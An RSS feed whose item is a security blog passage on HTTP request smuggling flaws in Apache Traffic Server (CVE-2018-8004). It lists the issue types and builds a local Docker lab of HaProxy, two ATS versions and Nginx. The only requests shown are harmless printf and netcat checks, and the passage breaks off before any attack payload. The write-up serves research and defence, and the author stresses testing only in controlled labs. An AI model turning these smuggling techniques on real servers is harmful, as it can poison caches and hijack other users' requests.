feed.xml

<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0">
	<channel>
		<title>RBleug</title>
		<description>Regilero's blog; Mostly tech things about web stuff.</description>
		<link>http://regilero.github.io</link>
		
			<item>
				<title>Security: HTTP Smuggling, Apache Traffic Server</title>
				<description>&lt;p&gt;&lt;small&gt;&lt;strong&gt;English version&lt;/strong&gt; (&lt;strong&gt;Version Française&lt;/strong&gt; disponible sur &lt;a href=&quot;https://www.makina-corpus.com/blog/metier/2018/securite-contrebande-de-http-apache-traffic-server&quot;&gt;makina corpus&lt;/a&gt;).&lt;/small&gt;
&lt;small&gt;estimated read time: 15 min to really more&lt;/small&gt;&lt;/p&gt;

&lt;h2&gt;What is this about ?&lt;/h2&gt;

&lt;p&gt;This article will give a deep explanation of HTTP Smuggling issues present in &lt;a href=&quot;https://nvd.nist.gov/vuln/detail/CVE-2018-8004&quot;&gt;CVE-2018-8004&lt;/a&gt;. Firstly because there&#39;s currently not much informations about it (&lt;em&gt;&quot;Undergoing Analysis&quot;&lt;/em&gt; at the time of this writing on the previous link). Secondly some time has passed since the official announce (and even more since the availability of fixs in v7), also mostly because I keep receiving demands on what exactly is HTTP Smuggling and how to test/exploit this type of issues, also beacause Smuggling issues are now trending and easier to test &lt;a href=&quot;https://portswigger.net/blog/http-desync-attacks-request-smuggling-reborn&quot;&gt;thanks for the great stuff of James Kettle&lt;/a&gt; (&lt;a href=&quot;https://twitter.com/albinowax&quot;&gt;@albinowax&lt;/a&gt;).&lt;/p&gt;

&lt;p&gt;So, this time, I&#39;ll give you not only &lt;strong&gt;details&lt;/strong&gt; but also a step by step &lt;strong&gt;demo&lt;/strong&gt; with some &lt;strong&gt;DockerFiles&lt;/strong&gt; to build your own test lab.
You could use that test lab to experiment it with manual raw queries, or test the recently added &lt;a href=&quot;https://portswigger.net/burp/communitydownload&quot;&gt;BURP Suite&lt;/a&gt; Smuggling tools. I&#39;m really
a big partisan of always searching for Smuggling issues in non production environements, for legal reasons and also to avoid unattended
consequences (and we&#39;ll see in this article, with the last issue, that unattended behaviors can always happen).&lt;/p&gt;

&lt;h2&gt;Apache Traffic Server ?&lt;/h2&gt;

&lt;p&gt;&lt;a href=&quot;http://trafficserver.apache.org/&quot;&gt;Apache Traffic Server, or ATS&lt;/a&gt; is an Open Source HTTP load balancer and Reverse Proxy Cache. Based on a Commercial product donated to the Apache Foundation. It&#39;s not related to Apache httpd HTTP server, the &quot;Apache&quot; name comes from the Apache foundation, the code is very different
from httpd.&lt;/p&gt;

&lt;p&gt;If you were to search from ATS installations &lt;a href=&quot;https://www.shodan.io/search?query=Server%3A+ATS&quot;&gt;on the wild&lt;/a&gt; you would find some, hopefully fixed now.&lt;/p&gt;

&lt;h3&gt;Fixed versions of ATS&lt;/h3&gt;

&lt;p&gt;As stated in the &lt;a href=&quot;https://nvd.nist.gov/vuln/detail/CVE-2018-8004&quot;&gt;CVE announce&lt;/a&gt; (2018-08-28) impacted ATS versions are versions &lt;strong&gt;6.0.0 to 6.2.2&lt;/strong&gt; and &lt;strong&gt;7.0.0 to 7.1.3&lt;/strong&gt;. Version 7.1.4 was released in 2018-08-02 and 6.2.3 in 2018-08-04. That&#39;s the offical announce, but I think 7.1.3 contained most of the fixs already, and is maybe not vulnerable. The announce was mostly delayed for 6.x backports (and some other fixs are relased in the same time, on other issues).&lt;/p&gt;

&lt;p&gt;If you wonder about previous versions, like 5.x, they&#39;re out of support, and quite certainly vulnerable. &lt;strong&gt;Do not use out of support versions.&lt;/strong&gt;&lt;/p&gt;

&lt;h2&gt;CVE-2018-8004&lt;/h2&gt;

&lt;p&gt;The &lt;a href=&quot;https://nvd.nist.gov/vuln/detail/CVE-2018-8004&quot;&gt;official CVE description&lt;/a&gt; is:&lt;/p&gt;

&lt;blockquote&gt;&lt;p&gt;There are multiple HTTP smuggling and cache poisoning issues when clients making malicious requests interact with ATS.&lt;/p&gt;&lt;/blockquote&gt;

&lt;p&gt;Which does not gives a lot of pointers, but there&#39;s much more information in the 4 pull requests listed:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;https://github.com/apache/trafficserver/pull/3192&quot;&gt;#3192: Return 400 if there is whitespace after the field name and before the colon&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://github.com/apache/trafficserver/pull/3201&quot;&gt;#3201: Close the connection when returning a 400 error response&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://github.com/apache/trafficserver/pull/3231&quot;&gt;#3231: Validate Content-Length headers for incoming requests &lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://github.com/apache/trafficserver/pull/3251&quot;&gt;#3251:  Drain the request body if there is a cache hit&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;


&lt;p&gt;If you already studied some of my previous posts, some of these sentences might already seems dubious. For example not closing a response stream after an error 400 is clearly a fault, based on the standards, but is also a good catch for an attacker. Chances are that crafting a bad messages chain you may succeed at receiving a response for some queries hidden in the body of an invalid request.&lt;/p&gt;

&lt;p&gt;The last one, &lt;em&gt;Drain the request body if there is a cache hit&lt;/em&gt; is the nicest one, as we will see on this article, and it was hard to detect.&lt;/p&gt;

&lt;p&gt;My original report listed 5 issues:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;HTTP request splitting&lt;/strong&gt; using NULL character in header value&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;HTTP request splitting&lt;/strong&gt; using huge header size&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;HTTP request splitting&lt;/strong&gt; using double Content-length headers&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;HTTP cache poisoning&lt;/strong&gt; using extra space before separator of header name and header value&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;HTTP request splitting&lt;/strong&gt; using ...&lt;em&gt;(no spoiler: I keep that for the end)&lt;/em&gt;&lt;/li&gt;
&lt;/ul&gt;


&lt;h2&gt;Step by step Proof of Concept&lt;/h2&gt;

&lt;p&gt;To understand the issues, and see the effects, We will be using a demonstration/research environment.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;If you either want to test HTTP Smuggling issues you should really, really, try to test it on a controlled environment. Testing issues on live environments would be difficult because:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;You may have some very good HTTP agents (load balancers, SSL terminators, security filters) between you and your target, hiding most of your success and errors.&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;You may triggers errors and behaviors that you have no idea about, for example I have encountered random errors on several fuzzing tests (on test envs), unreproductible, before understanding that this was related to the last smuggling issue we will study on this article. Effects were delayed on subsequent tests, and I was not in control, at all.&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;You may trigger errors on requests sent by other users, and/or for other domains. That&#39;s not like testing a self reflected XSS, you could end up in a court for that.&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Real life complete examples usually occurs with interactions between several different HTTP agents, like Nginx + Varnish, or ATS + HaProxy, or Pound + IIS + Nodejs, etc. You will have to understand how each actor interact with the other, and you will see it faster with a local low level network capture than blindly accross an unknown chain of agents (like for example to learn how to detect each agent on this chain).&lt;/strong&gt;&lt;/li&gt;
&lt;/ul&gt;


&lt;p&gt;So it&#39;s very important to be able to rebuild a laboratory env.&lt;/p&gt;

&lt;p&gt;And, if you find something, this env can then be used to send detailled bug reports to the program owners (in my own experience, it can sometimes be quite difficult to explain the issues, a working demo helps).&lt;/p&gt;

&lt;h3&gt;Set-up the lab: Docker instances&lt;/h3&gt;

&lt;p&gt;We will run 2 Apache Traffic Server Instance, one in version 6.x and one in version 7.x.&lt;/p&gt;

&lt;p&gt;To add some alterity, and potential smuggling issues, we will also add an Nginx docker, and an HaProy one.&lt;/p&gt;

&lt;p&gt;4 HTTP actors, each one on a local port:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;127.0.0.1:8001&lt;/strong&gt; : &lt;a href=&quot;https://www.haproxy.org/&quot;&gt;HaProxy&lt;/a&gt; (internally listening on port &lt;strong&gt;80&lt;/strong&gt;)&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;127.0.0.1:8002&lt;/strong&gt; : Nginx (internally listening on port &lt;strong&gt;80&lt;/strong&gt;)&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;127.0.0.1:8007&lt;/strong&gt; : ATS7 (internally listening on port &lt;strong&gt;8080&lt;/strong&gt;)&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;127.0.0.1:8006&lt;/strong&gt; : ATS6 (internally listening on port &lt;strong&gt;8080&lt;/strong&gt;), most examples will use ATS7, but you will ba able to test this older version simply using this port instead of the other (and altering the domain).&lt;/li&gt;
&lt;/ul&gt;


&lt;p&gt;We will chain some Reverse Proxy relations, Nginx will be the final backend, HaProxy the front load balancer, and between Nginx and HaProxy we will go through ATS6 or ATS7 based on the domain name used (&lt;strong&gt;dummy-host7.example.com&lt;/strong&gt; for ATS7 and &lt;strong&gt;dummy-host6.example.com&lt;/strong&gt; for ATS6)&lt;/p&gt;

&lt;p&gt;Note that the &lt;strong&gt;localhost port mapping&lt;/strong&gt; of the ATS and Nginx instances are not directly needed, if you can inject a request to Haproxy it will reach Nginx internally, via port 8080 of one of the ATS, and port 80 of Nginx. But that could be usefull if you want to target directly one of the server, and we will have to avoid the HaProxy part on most examples, because most attacks would be blocked by this load balancer. So most examples will directly target the ATS7 server first, on 8007. Later you can try to suceed targeting 8001, that will be harder.&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;                       +---[80]---+
                       | 8001-&amp;gt;80 |
                       |  HaProxy |
                       |          |
                       +--+---+---+
[dummy-host6.example.com] |   | [dummy-host7.example.com]
                  +-------+   +------+
                  |                  |
              +-[8080]-----+     +-[8080]-----+
              | 8006-&amp;gt;8080 |     | 8007-&amp;gt;8080 |
              |  ATS6      |     |  ATS7      |
              |            |     |            |
              +-----+------+     +----+-------+
                    |               |
                    +-------+-------+
                            |
                       +--[80]----+
                       | 8002-&amp;gt;80 |
                       |  Nginx   |
                       |          |
                       +----------+
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;To build this cluster we will use docker-compose, You can the find the &lt;a href=&quot;//regilero.github.io/theme/resource/ats/docker-compose.yml&quot;&gt;docker-compose.yml file here&lt;/a&gt;, but the content is quite short:&lt;/p&gt;

&lt;div class=&quot;highlight&quot;&gt;&lt;pre&gt;&lt;code class=&quot;language-yaml&quot; data-lang=&quot;yaml&quot;&gt;&lt;span class=&quot;l-Scalar-Plain&quot;&gt;version&lt;/span&gt;&lt;span class=&quot;p-Indicator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;s&quot;&gt;&amp;#39;3&amp;#39;&lt;/span&gt;
&lt;span class=&quot;l-Scalar-Plain&quot;&gt;services&lt;/span&gt;&lt;span class=&quot;p-Indicator&quot;&gt;:&lt;/span&gt;
  &lt;span class=&quot;l-Scalar-Plain&quot;&gt;haproxy&lt;/span&gt;&lt;span class=&quot;p-Indicator&quot;&gt;:&lt;/span&gt;
    &lt;span class=&quot;l-Scalar-Plain&quot;&gt;image&lt;/span&gt;&lt;span class=&quot;p-Indicator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;l-Scalar-Plain&quot;&gt;haproxy:1.6&lt;/span&gt;
    &lt;span class=&quot;l-Scalar-Plain&quot;&gt;build&lt;/span&gt;&lt;span class=&quot;p-Indicator&quot;&gt;:&lt;/span&gt;
      &lt;span class=&quot;l-Scalar-Plain&quot;&gt;context&lt;/span&gt;&lt;span class=&quot;p-Indicator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;l-Scalar-Plain&quot;&gt;.&lt;/span&gt;
      &lt;span class=&quot;l-Scalar-Plain&quot;&gt;dockerfile&lt;/span&gt;&lt;span class=&quot;p-Indicator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;l-Scalar-Plain&quot;&gt;Dockerfile-haproxy&lt;/span&gt;
    &lt;span class=&quot;l-Scalar-Plain&quot;&gt;expose&lt;/span&gt;&lt;span class=&quot;p-Indicator&quot;&gt;:&lt;/span&gt;
      &lt;span class=&quot;p-Indicator&quot;&gt;-&lt;/span&gt; &lt;span class=&quot;l-Scalar-Plain&quot;&gt;80&lt;/span&gt;
    &lt;span class=&quot;l-Scalar-Plain&quot;&gt;ports&lt;/span&gt;&lt;span class=&quot;p-Indicator&quot;&gt;:&lt;/span&gt;
      &lt;span class=&quot;p-Indicator&quot;&gt;-&lt;/span&gt; &lt;span class=&quot;s&quot;&gt;&amp;quot;8001:80&amp;quot;&lt;/span&gt;
    &lt;span class=&quot;l-Scalar-Plain&quot;&gt;links&lt;/span&gt;&lt;span class=&quot;p-Indicator&quot;&gt;:&lt;/span&gt;
      &lt;span class=&quot;p-Indicator&quot;&gt;-&lt;/span&gt; &lt;span class=&quot;l-Scalar-Plain&quot;&gt;ats7:linkedats7.net&lt;/span&gt;
      &lt;span class=&quot;p-Indicator&quot;&gt;-&lt;/span&gt; &lt;span class=&quot;l-Scalar-Plain&quot;&gt;ats6:linkedats6.net&lt;/span&gt;
    &lt;span class=&quot;l-Scalar-Plain&quot;&gt;depends_on&lt;/span&gt;&lt;span class=&quot;p-Indicator&quot;&gt;:&lt;/span&gt;
      &lt;span class=&quot;p-Indicator&quot;&gt;-&lt;/span&gt; &lt;span class=&quot;l-Scalar-Plain&quot;&gt;ats7&lt;/span&gt;
      &lt;span class=&quot;p-Indicator&quot;&gt;-&lt;/span&gt; &lt;span class=&quot;l-Scalar-Plain&quot;&gt;ats6&lt;/span&gt;
  &lt;span class=&quot;l-Scalar-Plain&quot;&gt;ats7&lt;/span&gt;&lt;span class=&quot;p-Indicator&quot;&gt;:&lt;/span&gt;
    &lt;span class=&quot;l-Scalar-Plain&quot;&gt;image&lt;/span&gt;&lt;span class=&quot;p-Indicator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;l-Scalar-Plain&quot;&gt;centos:7&lt;/span&gt;
    &lt;span class=&quot;l-Scalar-Plain&quot;&gt;build&lt;/span&gt;&lt;span class=&quot;p-Indicator&quot;&gt;:&lt;/span&gt;
      &lt;span class=&quot;l-Scalar-Plain&quot;&gt;context&lt;/span&gt;&lt;span class=&quot;p-Indicator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;l-Scalar-Plain&quot;&gt;.&lt;/span&gt;
      &lt;span class=&quot;l-Scalar-Plain&quot;&gt;dockerfile&lt;/span&gt;&lt;span class=&quot;p-Indicator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;l-Scalar-Plain&quot;&gt;Dockerfile-ats7&lt;/span&gt;
    &lt;span class=&quot;l-Scalar-Plain&quot;&gt;expose&lt;/span&gt;&lt;span class=&quot;p-Indicator&quot;&gt;:&lt;/span&gt;
      &lt;span class=&quot;p-Indicator&quot;&gt;-&lt;/span&gt; &lt;span class=&quot;l-Scalar-Plain&quot;&gt;8080&lt;/span&gt;
    &lt;span class=&quot;l-Scalar-Plain&quot;&gt;ports&lt;/span&gt;&lt;span class=&quot;p-Indicator&quot;&gt;:&lt;/span&gt;
      &lt;span class=&quot;p-Indicator&quot;&gt;-&lt;/span&gt; &lt;span class=&quot;s&quot;&gt;&amp;quot;8007:8080&amp;quot;&lt;/span&gt;
    &lt;span class=&quot;l-Scalar-Plain&quot;&gt;depends_on&lt;/span&gt;&lt;span class=&quot;p-Indicator&quot;&gt;:&lt;/span&gt;
      &lt;span class=&quot;p-Indicator&quot;&gt;-&lt;/span&gt; &lt;span class=&quot;l-Scalar-Plain&quot;&gt;nginx&lt;/span&gt;
    &lt;span class=&quot;l-Scalar-Plain&quot;&gt;links&lt;/span&gt;&lt;span class=&quot;p-Indicator&quot;&gt;:&lt;/span&gt;
      &lt;span class=&quot;p-Indicator&quot;&gt;-&lt;/span&gt; &lt;span class=&quot;l-Scalar-Plain&quot;&gt;nginx:linkednginx.net&lt;/span&gt;
  &lt;span class=&quot;l-Scalar-Plain&quot;&gt;ats6&lt;/span&gt;&lt;span class=&quot;p-Indicator&quot;&gt;:&lt;/span&gt;
    &lt;span class=&quot;l-Scalar-Plain&quot;&gt;image&lt;/span&gt;&lt;span class=&quot;p-Indicator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;l-Scalar-Plain&quot;&gt;centos:7&lt;/span&gt;
    &lt;span class=&quot;l-Scalar-Plain&quot;&gt;build&lt;/span&gt;&lt;span class=&quot;p-Indicator&quot;&gt;:&lt;/span&gt;
      &lt;span class=&quot;l-Scalar-Plain&quot;&gt;context&lt;/span&gt;&lt;span class=&quot;p-Indicator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;l-Scalar-Plain&quot;&gt;.&lt;/span&gt;
      &lt;span class=&quot;l-Scalar-Plain&quot;&gt;dockerfile&lt;/span&gt;&lt;span class=&quot;p-Indicator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;l-Scalar-Plain&quot;&gt;Dockerfile-ats6&lt;/span&gt;
    &lt;span class=&quot;l-Scalar-Plain&quot;&gt;expose&lt;/span&gt;&lt;span class=&quot;p-Indicator&quot;&gt;:&lt;/span&gt;
      &lt;span class=&quot;p-Indicator&quot;&gt;-&lt;/span&gt; &lt;span class=&quot;l-Scalar-Plain&quot;&gt;8080&lt;/span&gt;
    &lt;span class=&quot;l-Scalar-Plain&quot;&gt;ports&lt;/span&gt;&lt;span class=&quot;p-Indicator&quot;&gt;:&lt;/span&gt;
      &lt;span class=&quot;p-Indicator&quot;&gt;-&lt;/span&gt; &lt;span class=&quot;s&quot;&gt;&amp;quot;8006:8080&amp;quot;&lt;/span&gt;
    &lt;span class=&quot;l-Scalar-Plain&quot;&gt;depends_on&lt;/span&gt;&lt;span class=&quot;p-Indicator&quot;&gt;:&lt;/span&gt;
      &lt;span class=&quot;p-Indicator&quot;&gt;-&lt;/span&gt; &lt;span class=&quot;l-Scalar-Plain&quot;&gt;nginx&lt;/span&gt;
    &lt;span class=&quot;l-Scalar-Plain&quot;&gt;links&lt;/span&gt;&lt;span class=&quot;p-Indicator&quot;&gt;:&lt;/span&gt;
      &lt;span class=&quot;p-Indicator&quot;&gt;-&lt;/span&gt; &lt;span class=&quot;l-Scalar-Plain&quot;&gt;nginx:linkednginx.net&lt;/span&gt;
  &lt;span class=&quot;l-Scalar-Plain&quot;&gt;nginx&lt;/span&gt;&lt;span class=&quot;p-Indicator&quot;&gt;:&lt;/span&gt;
    &lt;span class=&quot;l-Scalar-Plain&quot;&gt;image&lt;/span&gt;&lt;span class=&quot;p-Indicator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;l-Scalar-Plain&quot;&gt;nginx:latest&lt;/span&gt;
    &lt;span class=&quot;l-Scalar-Plain&quot;&gt;build&lt;/span&gt;&lt;span class=&quot;p-Indicator&quot;&gt;:&lt;/span&gt;
      &lt;span class=&quot;l-Scalar-Plain&quot;&gt;context&lt;/span&gt;&lt;span class=&quot;p-Indicator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;l-Scalar-Plain&quot;&gt;.&lt;/span&gt;
      &lt;span class=&quot;l-Scalar-Plain&quot;&gt;dockerfile&lt;/span&gt;&lt;span class=&quot;p-Indicator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;l-Scalar-Plain&quot;&gt;Dockerfile-nginx&lt;/span&gt;
    &lt;span class=&quot;l-Scalar-Plain&quot;&gt;expose&lt;/span&gt;&lt;span class=&quot;p-Indicator&quot;&gt;:&lt;/span&gt;
      &lt;span class=&quot;p-Indicator&quot;&gt;-&lt;/span&gt; &lt;span class=&quot;l-Scalar-Plain&quot;&gt;80&lt;/span&gt;
    &lt;span class=&quot;l-Scalar-Plain&quot;&gt;ports&lt;/span&gt;&lt;span class=&quot;p-Indicator&quot;&gt;:&lt;/span&gt;
      &lt;span class=&quot;p-Indicator&quot;&gt;-&lt;/span&gt; &lt;span class=&quot;s&quot;&gt;&amp;quot;8002:80&amp;quot;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;


&lt;p&gt;To make this work you will also need the 4 specific Dockerfiles:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;//regilero.github.io/theme/resource/ats/Dockerfile-haproxy&quot;&gt;Docker-haproxy: an HaProxy Dockerfile, with the right conf&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;//regilero.github.io/theme/resource/ats/Dockerfile-nginx&quot;&gt;Docker-nginx: A very simple Nginx Dockerfile with one index.html page&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;//regilero.github.io/theme/resource/ats/Dockerfile-ats7&quot;&gt;Docker-ats7: An ATS 7.1.1 compiled from archive Dockerfile&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;//regilero.github.io/theme/resource/ats/Dockerfile-ats6&quot;&gt;Docker-ats6: An ATS 6.2.2 compiled from archive Dockerfile&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;


&lt;p&gt;Put all theses files (the &lt;code&gt;docker-compose.yml&lt;/code&gt; and the &lt;code&gt;Dockerfile-*&lt;/code&gt; files) into a working directory and run in this dir:&lt;/p&gt;

&lt;div class=&quot;highlight&quot;&gt;&lt;pre&gt;&lt;code class=&quot;language-bash&quot; data-lang=&quot;bash&quot;&gt;docker-compose build &lt;span class=&quot;o&quot;&gt;&amp;amp;&amp;amp;&lt;/span&gt; docker-compose up&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;


&lt;p&gt;You can now take a &lt;strong&gt;big break&lt;/strong&gt;, you are launching two compilations of ATS. Hopefully the next time a &lt;code&gt;up&lt;/code&gt; will be enough, and even the &lt;code&gt;build&lt;/code&gt; may not redo the compilation steps.&lt;/p&gt;

&lt;p&gt;You can easily add another &lt;code&gt;ats7-fixed&lt;/code&gt; element on the cluster, to test fixed version of ATS if you want. For now we will concentrate on detecting issues in flawed versions.&lt;/p&gt;

&lt;h3&gt;Test That Everything Works&lt;/h3&gt;

&lt;p&gt;We will run &lt;strong&gt;basic non attacking queries&lt;/strong&gt; on this installation, to check that everything is working, and to train ourselves on the &lt;code&gt;printf + netcat&lt;/code&gt; way of running queries. We will not use curl or wget to run HTTP query, because that would be impossible to write bad queries. So we need to use low level string manipulations (with &lt;code&gt;printf&lt;/code&gt; for example) and socket handling (with &lt;code&gt;netcat&lt;/code&gt; -- or &lt;code&gt;nc&lt;/code&gt; --).&lt;/p&gt;

&lt;p&gt;Test Nginx (that&#39;s a one-liner splitted for readability):&lt;/p&gt;

&lt;div class=&quot;highlight&quot;&gt;&lt;pre&gt;&lt;code class=&quot;language-bash&quot; data-lang=&quot;bash&quot;&gt;&lt;span class=&quot;nb&quot;&gt;printf&lt;/span&gt; &lt;span class=&quot;s1&quot;&gt;&amp;#39;GET / HTTP/1.1\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;s1&quot;&gt;&amp;#39;Host:dummy-host7.example.com\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;s1&quot;&gt;&amp;#39;\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;p&quot;&gt;|&lt;/span&gt; nc 127.0.0.1 8002&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;


&lt;p&gt;You should get the &lt;code&gt;index.html&lt;/code&gt; response, something like:&lt;/p&gt;

&lt;div class=&quot;highlight&quot;&gt;&lt;pre&gt;&lt;code class=&quot;language-http&quot; data-lang=&quot;http&quot;&gt;&lt;span class=&quot;kr&quot;&gt;HTTP&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;/&lt;/span&gt;&lt;span class=&quot;m&quot;&gt;1.1&lt;/span&gt; &lt;span class=&quot;m&quot;&gt;200&lt;/span&gt; &lt;span class=&quot;ne&quot;&gt;OK&lt;/span&gt;
&lt;span class=&quot;na&quot;&gt;Server&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;l&quot;&gt;nginx/1.15.5&lt;/span&gt;
&lt;span class=&quot;na&quot;&gt;Date&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;l&quot;&gt;Fri, 26 Oct 2018 15:28:20 GMT&lt;/span&gt;
&lt;span class=&quot;na&quot;&gt;Content-Type&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;l&quot;&gt;text/html&lt;/span&gt;
&lt;span class=&quot;na&quot;&gt;Content-Length&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;l&quot;&gt;120&lt;/span&gt;
&lt;span class=&quot;na&quot;&gt;Last-Modified&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;l&quot;&gt;Fri, 26 Oct 2018 14:16:28 GMT&lt;/span&gt;
&lt;span class=&quot;na&quot;&gt;Connection&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;l&quot;&gt;keep-alive&lt;/span&gt;
&lt;span class=&quot;na&quot;&gt;ETag&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;l&quot;&gt;&amp;quot;5bd321bc-78&amp;quot;&lt;/span&gt;
&lt;span class=&quot;na&quot;&gt;X-Location-echo&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;l&quot;&gt;/&lt;/span&gt;
&lt;span class=&quot;na&quot;&gt;X-Default-VH&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;l&quot;&gt;0&lt;/span&gt;
&lt;span class=&quot;na&quot;&gt;Cache-Control&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;l&quot;&gt;public, max-age=300&lt;/span&gt;
&lt;span class=&quot;na&quot;&gt;Accept-Ranges&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;l&quot;&gt;bytes&lt;/span&gt;

$&lt;span class=&quot;nt&quot;&gt;&amp;lt;html&amp;gt;&amp;lt;head&amp;gt;&amp;lt;title&amp;gt;&lt;/span&gt;Nginx default static page&lt;span class=&quot;nt&quot;&gt;&amp;lt;/title&amp;gt;&amp;lt;/head&amp;gt;&lt;/span&gt;
&lt;span class=&quot;nt&quot;&gt;&amp;lt;body&amp;gt;&amp;lt;h1&amp;gt;&lt;/span&gt;Hello World&lt;span class=&quot;nt&quot;&gt;&amp;lt;/h1&amp;gt;&lt;/span&gt;
&lt;span class=&quot;nt&quot;&gt;&amp;lt;p&amp;gt;&lt;/span&gt;It works!&lt;span class=&quot;nt&quot;&gt;&amp;lt;/p&amp;gt;&lt;/span&gt;
&lt;span class=&quot;nt&quot;&gt;&amp;lt;/body&amp;gt;&amp;lt;/html&amp;gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;


&lt;p&gt;Then test ATS7 and ATS6:&lt;/p&gt;

&lt;div class=&quot;highlight&quot;&gt;&lt;pre&gt;&lt;code class=&quot;language-bash&quot; data-lang=&quot;bash&quot;&gt;&lt;span class=&quot;nb&quot;&gt;printf&lt;/span&gt; &lt;span class=&quot;s1&quot;&gt;&amp;#39;GET / HTTP/1.1\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;s1&quot;&gt;&amp;#39;Host:dummy-host7.example.com\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;s1&quot;&gt;&amp;#39;\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;p&quot;&gt;|&lt;/span&gt; nc 127.0.0.1 8007

&lt;span class=&quot;nb&quot;&gt;printf&lt;/span&gt; &lt;span class=&quot;s1&quot;&gt;&amp;#39;GET / HTTP/1.1\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;s1&quot;&gt;&amp;#39;Host:dummy-host6.example.com\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;s1&quot;&gt;&amp;#39;\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;p&quot;&gt;|&lt;/span&gt; nc 127.0.0.1 8006&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;


&lt;p&gt;Then test HaProxy, altering the &lt;code&gt;Host&lt;/code&gt; name should make the transit via ATS7 or ATS6 (check the &lt;code&gt;Server:&lt;/code&gt; header response):&lt;/p&gt;

&lt;div class=&quot;highlight&quot;&gt;&lt;pre&gt;&lt;code class=&quot;language-bash&quot; data-lang=&quot;bash&quot;&gt;&lt;span class=&quot;nb&quot;&gt;printf&lt;/span&gt; &lt;span class=&quot;s1&quot;&gt;&amp;#39;GET / HTTP/1.1\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
&lt;span class=&quot;s1&quot;&gt;&amp;#39;Host:dummy-host7.example.com\r\n&amp;#39;&lt;/span&gt;&lt;span class=&quot;se&quot;&gt;\&lt;/span&gt;
